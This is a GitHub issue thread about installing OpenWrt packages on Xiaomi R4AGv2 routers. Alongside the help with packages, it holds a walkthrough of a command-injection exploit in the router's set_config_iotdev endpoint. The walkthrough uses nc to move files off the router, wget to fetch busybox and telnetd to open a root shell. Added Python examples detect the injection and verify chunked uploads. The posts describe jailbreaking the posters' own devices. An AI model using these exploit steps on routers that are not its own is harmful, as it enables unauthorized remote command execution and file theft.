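    report = diagnose(SAMPLE_OPKG_OUTPUT, "5.4.216")
    for ver, pkgs in report["kernel_mismatch"].items():
        print(f"feed built for kernel {ver}, not installable here: {', '.join(pkgs)}")
    for dep, pkgs in report["other_missing"].items():
        print(f"dependency {dep} missing from all feeds, needed by: {', '.join(pkgs)}")
```

On the router, `opkg list-installed kernel` gives the full `version-release-vermagic` string, which lets `kernel_compatible` check the vermagic hash as well instead of only the base version.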

@MrTaiKe

MrTaiKe commented Nov 11, 2022

> I have no idea how to solve this error. I will try to build a firmware myself. Could you teach me how to build an R4AGv2 image with passwall.ipk? I plan to refer to the link below to learn the operation process, but I don't know how to combine it with the existing 4A configuration file. xiaorouji/openwrt-passwall#1603

@fengjiaqi927
I am not using Windows OS, and I am not sure about all your setups. I recommend you watch this video first before you spend more time on this: https://www.youtube.com/watch?v=WJ3VollEYy4 , especially the fifth minute (pay attention at minute 5). Pay attention that he provided a few ways to install a new package.
Maybe it will help to save you a lot of time. Let me know if it helps!

@fengjiaqi927

> > I have no idea how to solve this error. I will try to build a firmware myself. Could you teach me how to build an R4AGv2 image with passwall.ipk? I plan to refer to the link below to learn the operation process, but I don't know how to combine it with the existing 4A configuration file. xiaorouji/openwrt-passwall#1603
>
> @fengjiaqi927 I am not using Windows OS, and I am not sure about all your setups. I recommend you watch this video first before you spend more time on this: https://www.youtube.com/watch?v=WJ3VollEYy4 , especially the fifth minute (pay attention at minute 5). Pay attention that he provided a few ways to install a new package. Maybe it will help to save you a lot of time. Let me know if it helps!

It seems that I still have a long way to go. And the video tends to teach how to install software on OpenWrt. But I want to learn how to build the ipk for the specified kernel and platform from the source code, or learn how to build a new sysupgrade.bin for the Xiaomi 4AGv2 with the specified kernel (then I can use bypass with kernel 5.10.146-1-1: https://op.supes.top/packages/mipsel_24kc/kiddin9/luci-app-bypass_git-23.303.44828-ba42a9a_all.ipk)
Thanks again for your help!!!! @MrTaiKe The road ahead is long and far; I will keep searching high and low.

@MrTaiKe

MrTaiKe commented Nov 12, 2022

@fengjiaqi927
Learning how to compile an OpenWrt sysupgrade.bin? It's a long way to learn. For a quick start, I picked some up by reading the README.md of https://github.com/wbs306/Action_OpenWrt_Xiaomi_R4AG. (I started learning 6 days ago.)

Meanwhile, check this out: there are ipk files for passwall1, passwall2 and bypass, built with kernel version 5.4.216.
However, when I tried to compile them for you, I guess the image exceeded 16MB, so it did not output a sysupgrade.bin, because there are many dependencies..... This device only has 16MB of ROM.
https://github.com/MrTaiKe/Action_OpenWrt_Xiaomi_R4AGv2/actions/runs/3449151089#artifacts

I also built a minimal version with kernel 5.4.216, which contains a sysupgrade.bin that you can flash onto your router.
https://github.com/MrTaiKe/Action_OpenWrt_Xiaomi_R4AGv2/actions/runs/3447034491#artifacts

You could probably try something out from these two builds. Perhaps first flash the sysupgrade.bin from 3447034491, and manually add ipks from 3449151089. You probably have to watch out for the ROM space limitation.... You probably cannot have all ipks installed, or you will have to buy a device with a larger ROM. BEST LUCK to you

@fengjiaqi927

fengjiaqi927 commented Nov 12, 2022

@MrTaiKe
I have tried the guide and successfully installed passwall ~
Thank U !!!

It seems that the supported protocols are limited due to space constraints, e.g. v2ray.

Anyway, let's put an end to this for now ~ I can use an SSR node alternatively.

@MrTaiKe

MrTaiKe commented Nov 12, 2022

@fengjiaqi927
I am very glad you made it!!! Very good!! Yes, you will have to unload unwanted apps to accommodate the ROM space constraint. So you somehow managed to combine both 3447034491 and 3449151089 to make it happen? Was dealing with dependencies a big hurdle this time? I am curious if you did all this with command lines? Thx

@fengjiaqi927

I rebooted my 4AGv2 and flashed the 3447034491.bin first. Then I downloaded the packages in 3449151089 and tried to install them by following these steps:

A simple tutorial for installing packages locally:

  1. Open Internet Information Services (IIS) on Windows to establish a local web server.
  2. Download the packages to be installed, and copy them to the root directory of the web site.
     Test the web server by entering the address http://192.168.31.227/base (the IP should be replaced according to yours), and try to download an .ipk file.
  3. Add the local packages to the opkg config list:
     src/gz local_base http://192.168.31.227/base
     src/gz local_luci http://192.168.31.227/luci
     src/gz local_packages http://192.168.31.227/packages
     src/gz local_routing http://192.168.31.227/routing
     src/gz local_small8 http://192.168.31.227/small8
     src/gz local_telephony http://192.168.31.227/telephony
  4. opkg update
  5. opkg install luci-app-passwall

@ivan-semkin

Hello! Can you please also build the openvpn ipks (openvpn-openssl and luci-app-openvpn) for kernel version 5.4.216?

@MrTaiKe

MrTaiKe commented Nov 15, 2022

@ivan-semkin-gismart , I tried to build one for you for kernel 5.4.216, but failed a few times. I was able to build one with 5.4.224; you can browse the folder "Luci" to find the ipks etc... Hope that this could help you anyway.
openvpn-openssl and luci-app-openvpn + sysupgrade.bin

@MrTaiKe

MrTaiKe commented Nov 15, 2022

@fengjiaqi927 , 👍 Great!! Glad it all worked out smoothly!

@ivan-semkin

@MrTaiKe I don't think that it will work due to the kernel version mismatch. Can you maybe try to build wireguard-tools then? And luci-app-wireguard.

@MrTaiKe

MrTaiKe commented Nov 15, 2022

@ivan-semkin-gismart , did you look into the zip file? It also has the sysupgrade.bin. It was a base system built ONLY with openvpn-openssl and luci-app-openvpn, a very slim bin (image). Perhaps you could use this bin to start with, then add other ipk(s). Btw, I also wonder if you could still install them onto any kernel version 5.4.xx? What do you think?

If none of them works, let me know. I will try.

@ivan-semkin

@MrTaiKe thank you for the help, I was able to get openvpn working

@MrTaiKe

MrTaiKe commented Nov 16, 2022

@ivan-semkin-gismart, I am glad to hear it works. Here is also a link for wireguard ipk(s) with Kernel 5.4.224.
I guess you will probably find these ipks somewhat useful. Perhaps it could work with any kernel version starting with 5.4.xx (I am not sure. Plz let me know if it works. Thx!)
wireguard-tools and luci-app-wireguard + sysupgrade.bin

@ivan-semkin

@MrTaiKe I was able to install it on 5.4.xx. I guess only kernel modules (kmod-*) are completely incompatible.

@chekn

chekn commented Jan 1, 2023

I managed to get shell access on this device without a chip programmer

The instructions are valid for macOS and GNU/Linux. I don't know how to pipe stuff from or to netcat on Windows.

Introduction

I am on R4AV2 firmware MiWiFi Stable 2.30.20
This firmware has the speedtest exploit patched, but it still has the set_config_iotdev remote exec exploit:
In short, if you make a GET request (open the link in the browser) to http://{{{ROUTER_IP}}}/cgi-bin/luci/;stok={{{STOK}}}/api/misystem/set_config_iotdev?bssid=XXXXXX&user_id=XXXXXX&ssid=-h%0A{{{URL_ENCODED_COMMAND}}}%0A , the command in {{{URL_ENCODED_COMMAND}}} gets executed.
By default, {{{ROUTER_IP}}} is 192.168.31.1 (the default gateway in the network settings of your PC connected to the router). {{{STOK}}} can be found in the URL after logging into the admin console of the router (http://192.168.31.1/cgi-bin/luci/;stok=STOK_WILL_BE_HERE/web/home#router). And, well, {{{URL_ENCODED_COMMAND}}} is the shell command that you want to execute, in URL-encoded format (https://www.urlencoder.io/).
You can verify the exploit by executing the reboot command: http://192.168.31.1/cgi-bin/luci/;stok={{{STOK}}}/api/misystem/set_config_iotdev?bssid=XXXXXX&user_id=XXXXXX&ssid=-h%0Areboot%0A - the router will reboot.
Unfortunately for us, Xiaomi removed the dropbear (ssh) binaries in this firmware. And I couldn't make the built-in telnet work.

NetCat saves the day

But! nc (netcat/ncat) works like a charm! Abusing that, we can transfer any files to or from the router (and thus we can upload working telnet/ssh/ftp/whatever binaries). ncat can be downloaded here: https://nmap.org/download
To download a file from the router:
On your computer: run ncat -l 1234 > downloaded_file_name.txt
On your router: run nc {{{YOUR_PC_IP_ADDR}}} 1234 < /path/to/file_on_router (via the exploit mentioned above)
You can test that by downloading /etc/hosts from the router.
You should replace {{{YOUR_PC_IP_ADDR}}} with the local IP of your computer (192.168.31.X).
To upload a file to the router:
On your computer: run ncat -l 1234 < file_to_upload_from_your_pc.txt
On your router: run nc {{{YOUR_PC_IP_ADDR}}} 1234 > /path/to/saved_file (via the exploit mentioned above)
You can test it by uploading a small file from your PC to /tmp/file.txt, and then downloading it back via the method described above.
But! Here's a catch. From my testing, the router can only receive files up to 8Kb via nc. Our telnet/ssh binaries will surely be bigger than that. So, we need to split our binaries.

Splitting files

As I don't like splitting raw binaries, I decided to convert my binary to base64 first. You can do it here, for example: https://base64.guru/converter/encode/file
To split the resulting base64 file into pieces, run split -b 6K base64.txt on your computer (I decided to split into 6Kb pieces to be extra safe; more testing required).
The result of this command will be a folder full of files named xaa, xab, xac... I uploaded all of them to a separate folder on the router (/tmp/split), using the ncat method described above.
Then, I had to combine them back into a single file. To do that, run cat /tmp/split/x* > /tmp/split/final.txt on your router.
To decode the base64-encoded file into a binary, run base64 -d /tmp/split/final.txt > /tmp/split/final on your router.
To be extra sure that the file was not damaged, I decided to validate the md5 sum of the file by running md5sum /tmp/split/final on the router.
Then, make the file executable by running chmod +x /tmp/split/final on your router.
And finally, the file is ready to be executed.

Shell access

In my case, I uploaded a precompiled busybox binary with telnet support.
I ran /tmp/split/final telnetd on my router, and the telnet server was successfully launched.
Then, I connected to it by running telnet 192.168.31.1 on my PC.

Afterthoughts

To simplify the process of uploading multiple files to the router, I made a small Python script for batch uploads:
upl_file.py.zip
To use it, first edit the script to configure your PC's IP addr and the router's STOK. Then, make a /tmp/split folder by executing mkdir /tmp/split/ on the router. Create a new folder on your PC called split in the same folder where your script is, and put all the xaa, xab, xac... files there. Install the requests module for python3, if not already installed, by running pip3 install requests --user on your PC. And finally, run the script by executing python3 upl_file.py on your PC.
I also realized that I can explore the file system of the router by piping stdout/stderr of commands on the router to a file in /tmp, and then downloading the file to my PC via ncat. I also made a script for that, but as I figured out how to get telnet access, this doesn't seem relevant, so I will not be posting it.
Known working busybox binary: busybox.zip
For the lazy ones, here's an already split busybox binary: split_busybox.zip
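As an added example (not chekn's script and not part of OpenWRTInvasion), here is a small Python detector for the request pattern the post above describes: it runs over constructed access-log lines in a common-log-style format, URL-decodes each query string, and reports requests to the set_config_iotdev endpoint whose `ssid` value carries a newline, which is what the injection relies on. The log layout, the field names and the `PLACEHOLDERSTOK` token are assumptions made for the example.

```python
"""Flag requests matching the set_config_iotdev command-injection pattern.

Added example, not part of the GitHub issue or of OpenWRTInvasion. The log
format below is an assumption (common log format); the sample lines and the
PLACEHOLDERSTOK session token are constructed for this example.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint named in the thread; the luci path in front of it carries ";stok=...".
ENDPOINT = "/api/misystem/set_config_iotdev"

# client identd user [timestamp] "METHOD target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample: a normal UI request, a benign set_config_iotdev call
# (plain ssid), two calls with an encoded newline (%0A) inside ssid, and one
# unparseable line that the detector must skip rather than crash on.
SAMPLE_LOG = """\
192.168.31.50 - - [01/Jan/2023:12:00:01 +0000] "GET /cgi-bin/luci/;stok=PLACEHOLDERSTOK/web/home HTTP/1.1" 200 5120
192.168.31.50 - - [01/Jan/2023:12:00:09 +0000] "GET /cgi-bin/luci/;stok=PLACEHOLDERSTOK/api/misystem/set_config_iotdev?bssid=XXXXXX&user_id=XXXXXX&ssid=-h%0Areboot%0A HTTP/1.1" 200 43
192.168.31.50 - - [01/Jan/2023:12:00:15 +0000] "GET /cgi-bin/luci/;stok=PLACEHOLDERSTOK/api/misystem/set_config_iotdev?bssid=XXXXXX&user_id=XXXXXX&ssid=HomeWifi HTTP/1.1" 200 43
192.168.31.51 - - [01/Jan/2023:12:01:00 +0000] "GET /cgi-bin/luci/;stok=PLACEHOLDERSTOK/api/misystem/set_config_iotdev?bssid=XXXXXX&user_id=XXXXXX&ssid=-h%0Aid%0A HTTP/1.1" 200 43
not a log line at all
"""


def parse_line(line):
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def inspect_request(target):
    """Return the decoded ssid if `target` hits the vulnerable endpoint with a
    newline-bearing ssid, else None. urlsplit keeps ';stok=...' in the path,
    and parse_qs turns %0A / %0D into real newline characters."""
    parts = urlsplit(target)
    if not parts.path.endswith(ENDPOINT):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    for value in params.get("ssid", []):
        if "\n" in value or "\r" in value:
            return value
    return None


def injected_lines(ssid):
    """Split the decoded ssid on line breaks, drop the leading option token
    (the '-h' in the thread's URL) and empty pieces; what remains is what the
    router would have run as separate shell lines."""
    pieces = [p.strip() for p in ssid.replace("\r", "\n").split("\n")]
    return [p for p in pieces[1:] if p]


def analyze(log_text):
    """Run the detector over a whole log; return one finding per flagged request."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ssid = inspect_request(rec["target"])
        if ssid is None:
            continue
        findings.append({"ip": rec["ip"], "time": rec["ts"],
                         "status": rec["status"], "injected": injected_lines(ssid)})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} status={f['status']} injected={f['injected']}")
```

A benign `ssid` with no line break is never flagged, so the rule keys on the separator the injection needs rather than on any particular command; an HTTP 200 on such a request is the signal that the firmware accepted it.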

Good job! I almost gave up on this router. Nice Russian guy!

I launched telnet using your way. Nice Russian guy!👍👍👍

But the telnet login fails..
I tried user root with the passwords
root, password, all of these
fail fail....

This is a copy of the telnet output:
XiaoQiang login: root
Password:
Login incorrect
XiaoQiang login:
Login timed out after 60 seconds

So what is your telnet root password? That's what I want to know.

@ivan-semkin

@chekn there is an updated version of the script at #155

If telnet is launched successfully then there should be no telnet password with the login root. Check out the pull request above

@LordPinhead

I've broken 3 routers with the script without problems, so please try it and give me feedback. Maybe I'll have the time to reimplement the script a bit better, include the old attack, and make it a bit more modular, in case they patch the backdoor one day and we have to use another approach.

@chekn

chekn commented Jan 13, 2023

Thanks, I have passed. Now I can "drive the car" everywhere.
1. During the process, I directly ran a Python Flask HTTP server and wget'd a new telnet.
2. When I wrote OpenWrt successfully, I logged into it; it was poor:
the WAN never came through until I switched to writing this [PandoraBox_2990] and configured the VLAN.
Finally the WAN is open, traffic flows normally, I relax.

The router web UI:

@chekn

chekn commented Jan 13, 2023

tks

@Salpadding

Salpadding commented Mar 13, 2023

Thx
Your upload script helped me a lot.
I can execute commands and get output with 'nc -l 1234' and 'ls /tmp/* | nc my_pc 1234'.
Then I found the wget command is available in my v2 router: 'wget --help | nc my_pc 1234'
and uploaded busybox: 'wget -O /tmp/busybox http://my_pc/busybox'
also 'md5sum /tmp/busybox | nc my_pc 1234'; 'chmod a+x /tmp/busybox && /tmp/busybox telnetd'
The root password can be generated here: https://miwifi.gq/
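Both chekn's split/cat/base64/md5sum procedure and the md5sum check in the post above trust the eye to compare digests after the fact. As an added example (not code from the thread or from OpenWRTInvasion), the Python below does the same chunking on constructed sample bytes and records a manifest of per-piece and whole-file digests before transfer, so that a missing or truncated piece is named explicitly instead of yielding a silently corrupt file. The 6K piece size and the split-style xaa/xab names come from the thread; the manifest layout and the function names are assumptions made for the example.

```python
"""Chunk a file as base64 pieces, then reassemble and verify before use.

Added example, not part of the GitHub issue or of OpenWRTInvasion. The
manifest format and the helper names are assumptions; the payload is a
constructed stand-in for a binary.
"""
import base64
import hashlib

CHUNK_SIZE = 6 * 1024  # the 6K piece size the thread settles on, under its observed ~8K limit


def chunk_name(index):
    """split(1)-style names: 0 -> xaa, 1 -> xab, 26 -> xba (valid up to 675)."""
    return "x" + chr(ord("a") + index // 26) + chr(ord("a") + index % 26)


def make_pieces(data, chunk_size=CHUNK_SIZE):
    """Base64-encode `data` and cut the text into fixed-size pieces.
    Returns (pieces, manifest): pieces maps split-style names to bytes; the
    manifest records each piece's md5, the whole file's md5 and its length."""
    encoded = base64.b64encode(data)
    pieces = {
        chunk_name(i): encoded[off:off + chunk_size]
        for i, off in enumerate(range(0, len(encoded), chunk_size))
    }
    manifest = {
        "pieces": {name: hashlib.md5(body).hexdigest() for name, body in pieces.items()},
        "total_md5": hashlib.md5(data).hexdigest(),
        "size": len(data),
    }
    return pieces, manifest


def reassemble(received, manifest):
    """Check every expected piece against the manifest, join them in name
    order, base64-decode and verify the whole. Raises ValueError naming the
    first problem found, so nothing half-decoded is ever handed back."""
    for name, want in manifest["pieces"].items():
        body = received.get(name)
        if body is None:
            raise ValueError(f"piece {name} missing")
        got = hashlib.md5(body).hexdigest()
        if got != want:
            raise ValueError(f"piece {name} corrupt or truncated ({len(body)} bytes, md5 {got})")
    joined = b"".join(received[name] for name in sorted(manifest["pieces"]))
    try:
        data = base64.b64decode(joined, validate=True)
    except ValueError as exc:  # binascii.Error is a ValueError subclass
        raise ValueError(f"base64 decode failed: {exc}") from exc
    if len(data) != manifest["size"] or hashlib.md5(data).hexdigest() != manifest["total_md5"]:
        raise ValueError("reassembled file does not match the recorded digest")
    return data


def demo_truncated():
    """Simulate the receive limit cutting the second piece short; return the error text."""
    payload = bytes(range(256)) * 100          # 25,600 constructed bytes
    pieces, manifest = make_pieces(payload)
    damaged = dict(pieces)
    damaged["xab"] = damaged["xab"][:4000]     # truncated transfer of piece xab
    try:
        reassemble(damaged, manifest)
    except ValueError as exc:
        return str(exc)
    return "no error"


if __name__ == "__main__":
    sample = bytes(range(256)) * 100
    pieces, manifest = make_pieces(sample)
    print(f"{len(pieces)} pieces: {', '.join(pieces)}")
    print("round trip ok:", reassemble(pieces, manifest) == sample)
    print("truncated piece:", demo_truncated())
```

The md5 in the manifest only detects transport damage, which is the failure the thread ran into; it says nothing about where the binary came from. Before a file is made executable, the whole-file digest should also be compared against one obtained from the publisher out of band, not just against a value computed on the same machine that did the upload.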
